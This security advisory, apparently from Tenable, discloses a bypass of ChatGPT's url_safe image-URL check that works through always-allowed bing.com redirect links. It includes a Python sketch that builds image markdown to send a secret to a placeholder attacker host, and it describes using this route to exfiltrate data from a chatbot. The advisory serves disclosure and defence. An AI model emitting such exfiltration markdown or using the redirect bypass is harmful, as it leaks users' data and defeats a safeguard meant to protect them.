Tenable researchers discovered a method by which the url_safe defense mechanism in ChatGPT can be bypassed. An attacker could exploit this bypass to force the loading of malicious resources used for phishing or a variety of other purposes. At the time this advisory was published, the issue remained unresolved.
ChatGPT aims to protect its users by verifying URLs and checking them for potentially malicious content; this mechanism is called url_safe. Whenever a URL is referenced in the chat through image markdown or a hyperlink, ChatGPT verifies that the destination is trustworthy and reliable, and only then processes and acts on it. This functionality protects the engine and its users from uncontrolled or unsafe URLs. However, we managed to bypass this core defense mechanism and reach any website we wanted, regardless of its maliciousness.
Bypassing the url_safe defense mechanism
Rendering images is usually the most effective technique for exfiltrating data. We noticed that OpenAI tried to block the rendering of images from unsafe URLs with the url_safe defense mechanism, but we managed to bypass it.
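To illustrate why image rendering is such an effective exfiltration channel, here is a minimal sketch. The sink domain and payload format are hypothetical, not taken from the research; the point is that the model only has to emit a markdown string, and the client rendering it issues an HTTP GET that carries the data to the attacker:

```python
from urllib.parse import quote

def exfil_markdown(secret: str, sink: str = "https://attacker.example/collect") -> str:
    """Build an image-markdown payload. If the client renders it, the
    browser fetches the image URL and thereby sends `secret` to the
    attacker's server as a query parameter.
    (`attacker.example` is a placeholder, not a real sink.)"""
    return f"![x]({sink}?q={quote(secret)})"

print(exfil_markdown("user's private note"))
# emits: ![x](https://attacker.example/collect?q=user%27s%20private%20note)
```

This is exactly the pattern url_safe is meant to stop: the image URL must be judged safe before the client will fetch it.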
The url_safe function runs whenever it recognizes a URL in the chat, whether through image markdown, a hyperlink, or another type of link. It simply sends the URL to ChatGPT’s backend, which returns whether the URL is safe.
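The client-side flow can be sketched as follows. The function name, regex, and callback shape are illustrative assumptions, not OpenAI’s actual implementation; the essential behavior is that every image-markdown URL is checked against a backend verdict before rendering:

```python
import re

# Matches image markdown of the form ![alt](url) and captures the URL.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)\)")

def render_gate(chat_text: str, is_url_safe) -> list:
    """Sketch of the gate: extract every image-markdown URL from the
    model's output and render only those the backend reports as safe.
    `is_url_safe` stands in for the backend call ChatGPT makes."""
    rendered = []
    for match in IMAGE_MD.finditer(chat_text):
        url = match.group("url")
        if is_url_safe(url):  # backend verdict: True = render, False = block
            rendered.append(url)
    return rendered

# A URL the backend flags as unsafe never gets rendered.
blocked = render_gate("![a](https://evil.example/x)", lambda u: False)
print(blocked)  # []
```

Under this model, the whole defense reduces to a single boolean per URL, which is why a trusted domain acting as an open redirect defeats it.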
We noticed that URLs from bing.com are always allowed, and we managed to abuse this by using our own sites indexed on Bing. Sites indexed on Bing are served through a wrapped link that redirects the user from a bing.com link to the indexed website - essentially an open redirect as a service.
With our bing.com links, the url_safe defense mechanism returned true, our image markdowns rendered successfully, and the bypass was complete.
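A naive allowlist on the link’s hostname shows why the wrapped Bing links slip through: the check sees only bing.com, while the redirect delivers the attacker’s page. The allowlist logic and the URL shapes below are illustrative assumptions, not ChatGPT’s actual check:

```python
from urllib.parse import urlparse

# Assumed allowlist for illustration only.
TRUSTED_HOSTS = {"bing.com", "www.bing.com"}

def hostname_allowlisted(url: str) -> bool:
    """A check like this inspects only the outer hostname -- it cannot
    know that the bing.com link is a wrapper that redirects elsewhere."""
    return urlparse(url).hostname in TRUSTED_HOSTS

# A direct attacker URL is blocked.
assert not hostname_allowlisted("https://attacker.example/phish")

# The same destination behind a Bing-indexed wrapper link is allowed,
# because only the bing.com hostname is inspected.
wrapped = "https://www.bing.com/ck/a?...&u=<encoded attacker URL>"
assert hostname_allowlisted(wrapped)
```

Any open redirect on an allowlisted domain collapses the check in the same way; the Bing wrapper simply makes one available for every indexed site.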
Additional Research
Tenable would like to acknowledge similar url_safe bypass research published during the disclosure window: https://embracethered.com/blog/posts/2025/spaiware-and-chatgpt-command-and-control-via-prompt-injection-zombai/
Tenable researchers became aware of this publication, and of the referenced talk delivered at Black Hat Europe 2024, after the initial report of the discovery had been made to OpenAI but prior to the public disclosure of this advisory.